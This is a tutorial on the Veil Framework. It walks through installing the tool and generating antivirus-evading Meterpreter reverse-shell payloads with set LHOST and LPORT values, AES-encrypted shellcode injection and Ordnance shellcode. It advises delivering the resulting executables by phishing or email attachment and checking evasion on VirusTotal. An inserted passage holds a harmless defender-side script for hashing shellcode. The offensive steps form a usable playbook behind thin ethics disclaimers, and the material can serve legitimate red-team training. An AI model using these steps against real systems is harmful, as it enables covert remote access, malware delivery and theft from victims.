Veil Framework: Generating Antivirus-Evading Payloads with Examples

Guide to the Veil Framework: Generating Antivirus-Evading Payloads with Examples

Introduction

The Veil Framework is a powerful, open-source tool designed for penetration testers and red teamers to generate payloads that bypass common antivirus (AV) solutions. Developed primarily by Chris Truncer and maintained under the Veil-Framework GitHub repository, Veil focuses on creating obfuscated and encrypted payloads, often integrated with Metasploit's Meterpreter. As of its latest version (3.1.X), Veil supports multiple tools like Evasion for payload generation and Ordnance for shellcode creation.

Veil is particularly useful in ethical hacking scenarios where testers need to simulate real-world attacks without triggering security alerts. It employs techniques such as code obfuscation, encryption (e.g., AES), and polymorphism to evade detection. Note that Veil-Evasion (an older module) is deprecated; users should stick to Veil 3.0+ for active support.

This article provides a detailed tutorial on installing, configuring, and using Veil, complete with practical examples. We'll cover key features, step-by-step payload generation, and tips for effective use. All examples are for educational purposes only—ensure you have permission before testing on any system.

Key Features of Veil

  • Payload Generation: Creates executables or scripts that embed shellcode or connect directly to listeners like Meterpreter.
  • AV Evasion: Uses languages like Python, Go, Ruby, and C to obfuscate payloads, with options for encryption and custom shellcode.
  • Integration: Works seamlessly with Metasploit (msfvenom) and supports custom options for LHOST, LPORT, etc.
  • Tools Included:
    • Evasion: Main tool for generating evasive payloads.
    • Ordnance: Generates shellcode independently, useful for custom injections.
  • Cross-Platform Support: Officially for Kali Linux and Debian-based systems; compatible with Arch, Ubuntu, and others.
  • Command-Line Flexibility: Supports switches for automation, e.g., ./Veil.py -p <payload> -o <output>.

Veil does not install additional packages during runtime and requires manual setup of dependencies like Wine, Python 3, Ruby, and Go.

System Requirements

  • Operating Systems:
    • Officially Supported: Kali Linux Rolling 2018.1+, Debian 8+.
    • Likely Compatible: Arch Linux, Ubuntu 15.10+, Fedora 22+, Linux Mint, Parrot Security, Void Linux, Manjaro, BlackArch, Deepin 15+, Elementary.
  • Display: An X server must be running (for GUI dependencies like Wine).
  • Dependencies: Installed via setup script, including Wine (for Windows compilation), GoLang, Python, Ruby, and AutoIT.

Installation Guide

Veil can be installed via Kali's package manager or directly from GitHub. Superuser privileges (sudo) are required.

Method 1: Kali Linux Quick Install

  1. Update your system:

```text
sudo apt update
```

  2. Install Veil:

```text
sudo apt -y install veil
```

  3. Run the setup script:

```text
/usr/share/veil/config/setup.sh --force --silent
```

    • --force: Overwrites previous installations.
    • --silent: Automates the process without prompts.

Method 2: GitHub Clone Install

  1. Install Git:

```text
sudo apt-get -y install git
```

  2. Clone the repository:

```text
git clone https://github.com/Veil-Framework/Veil.git
```

  3. Navigate to the directory:

```text
cd Veil/
```

  4. Run the setup script:

```text
./config/setup.sh --force --silent
```

The script installs all dependencies, sets up Wine for Windows executables, and generates the config file /etc/veil/settings.py.

Troubleshooting Installation

  • Config Issues: If no payloads load, run ./Veil.py --config or cd config/; ./update-config.py.
  • Python Crypto Error: Edit setup.sh to replace python3-crypto with python3-cryptography (around line 285).
  • Py2Exe vs. PyInstaller: Py2Exe is recommended for lower detection rates but requires manual Windows installation.
  • Updates: Run ./Veil.py --update for framework updates.

After installation, launch Veil with ./Veil.py to access the main menu.

Usage Guide

Veil's interface is menu-driven but supports command-line arguments for automation.

Main Menu Overview

Upon launching:

```text
$ ./Veil.py
===============================================================================
                             Veil | [Version]: 3.1.6
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

  2 tools loaded

Available Tools:

  1)  Evasion
  2)  Ordnance

Available Commands:

  exit      Completely exit Veil
  info      Information on a specific tool
  list      List available tools
  options     Show Veil configuration
  update      Update Veil
  use     Use a specific tool

Veil>:
```

  • Use list to view tools.
  • Use use 1 for Evasion or use 2 for Ordnance.
  • info <tool> for details.

Command-Line Options

Run ./Veil.py --help for full options:

  • --tool <TOOL>: Specify tool (e.g., Evasion).
  • -p <PAYLOAD>: Payload name (e.g., go/meterpreter/rev_tcp).
  • -o <OUTPUT-NAME>: Base name for output files.
  • -c OPTION=value: Custom options (e.g., LHOST=192.168.1.1).
  • --msfvenom: Use Metasploit shellcode.
  • --clean: Clean up temporary files.

Practical Examples

Here are step-by-step examples of generating payloads. All assume a Kali Linux setup and Metasploit integration.

Example 1: Basic Meterpreter Reverse TCP Payload (Interactive Mode)

  1. Launch Veil: ./Veil.py
  2. Select Evasion: use 1
  3. List payloads: list (shows options like python/meterpreter/rev_tcp and go/shellcode_inject/base64).
  4. Use a payload: use go/meterpreter/rev_tcp (or its number, e.g., 44).
  5. Set options:

```text
set LHOST 192.168.1.100
set LPORT 4444
```

  6. Generate: generate
  7. Name the payload: e.g., "basic_payload"
  8. Output: the executable is saved to /var/lib/veil/output/compiled/basic_payload.exe and the source to /var/lib/veil/output/source/basic_payload.go.

On the listener side, start Metasploit:

```text
msfconsole -r /var/lib/veil/output/handlers/basic_payload_handler.rc
```

Deliver the .exe to the target (e.g., via phishing). When executed, it connects back without AV detection.

Example 2: Encrypted Shellcode Injection Payload (Command-Line Mode)

For advanced evasion using AES encryption:

```text
./Veil.py -t Evasion -p python/shellcode_inject/aes_encrypt -o encrypted_payload -c LHOST=192.168.1.100 LPORT=4444 USE_PYHERION=Y
```

  • USE_PYHERION=Y: Adds extra obfuscation.
  • This generates encrypted_payload.exe with VirtualAlloc injection.
  • Use Ordnance for custom shellcode: Select use 2 in Veil, choose rev_http, set options, and generate.

Test: Upload to VirusTotal or a target with AV; it often evades detection.

Example 3: Using Ordnance for Shellcode

  1. In Veil: use 2 (Ordnance).
  2. List payloads: list (e.g., rev_tcp, rev_http).
  3. Use: use rev_tcp
  4. Set: set LHOST 192.168.1.100, set LPORT 4444
  5. Generate: generate
  6. Output: Shellcode in hex format (e.g., \xfc\xe8\x82...).
  7. Integrate into Evasion: When prompted in a shellcode_inject payload, paste this instead of msfvenom.
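As an added defender-side example (not code from Veil or from this article), the Python below parses a pasted Ordnance-style "\x"-escaped blob into bytes, records its length and SHA-256 for a lab blocklist, and flags the cld/call preamble (\xfc\xe8) that stock msfvenom x86 stagers begin with; the sample blob is constructed here and the preamble check is a heuristic, not a signature.

```python
import hashlib
import re

# Constructed sample in the format Ordnance prints; it starts with the
# \xfc\xe8\x82 prefix shown in the article, the remaining bytes are filler.
SAMPLE_BLOB = r'"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"'

# cld; call ... : the opcode preamble shared by stock Metasploit x86 stagers.
MSF_X86_PREAMBLE = b"\xfc\xe8"

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_hex_blob(text: str) -> bytes:
    """Convert a Veil/Ordnance-style "\\xNN" string to raw bytes.

    Surrounding quotes and whitespace are ignored. Anything that is not a
    well-formed two-digit escape is rejected, so a truncated paste is caught
    instead of silently producing a shorter blob.
    """
    body = text.strip().strip("\"'")
    body = "".join(body.split())
    if _HEX_ESCAPE.sub("", body):
        raise ValueError("blob contains characters outside \\xNN escapes")
    return bytes(int(h, 16) for h in _HEX_ESCAPE.findall(body))


def triage_shellcode(text: str) -> dict:
    """Summarise a pasted shellcode blob for a detection baseline."""
    raw = parse_hex_blob(text)
    return {
        "length": len(raw),
        "sha256": hashlib.sha256(raw).hexdigest(),
        # Heuristic only: true for the cld/call stub msfvenom x86 payloads use.
        "msf_x86_preamble": raw.startswith(MSF_X86_PREAMBLE),
    }


if __name__ == "__main__":
    print(triage_shellcode(SAMPLE_BLOB))
```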

Example 4: Bypassing AV in a Lab Scenario

  • Generate: python/meterpreter/rev_https (uses HTTPS for encrypted callback).
  • Set LHOST/LPORT.
  • Deliver via email attachment.
  • Listener: Use the generated .rc file in msfconsole.
  • Result: Gains Meterpreter session; test against AV like Avast or Windows Defender.

Best Practices and Tips

  • Ethics and Legality: Use only in authorized environments (e.g., bug bounties, labs). Misuse is illegal.
  • Testing: Always scan generated payloads with tools like VirusTotal to verify evasion.
  • Customization: Experiment with languages (Go for lower detection) and encoders (-e ENCODER).
  • Integration: Combine with social engineering for delivery.
  • Limitations: AV vendors update signatures; Veil may not evade all (e.g., behavior-based detection).
  • Alternatives: If Veil fails, try msfvenom with custom encoders or tools like TheFatRat.
  • Resources:

Conclusion

The Veil Framework remains a cornerstone for red teaming, enabling the creation of sophisticated, undetectable payloads. By mastering its tools like Evasion and Ordnance, ethical hackers can better assess and strengthen defenses. Remember, with great power comes great responsibility—always prioritize ethical use.


Author: Engr. M A Rahsid Rony

Date: September 06, 2025

For updates, visit the official Veil website: https://www.veil-framework.com/
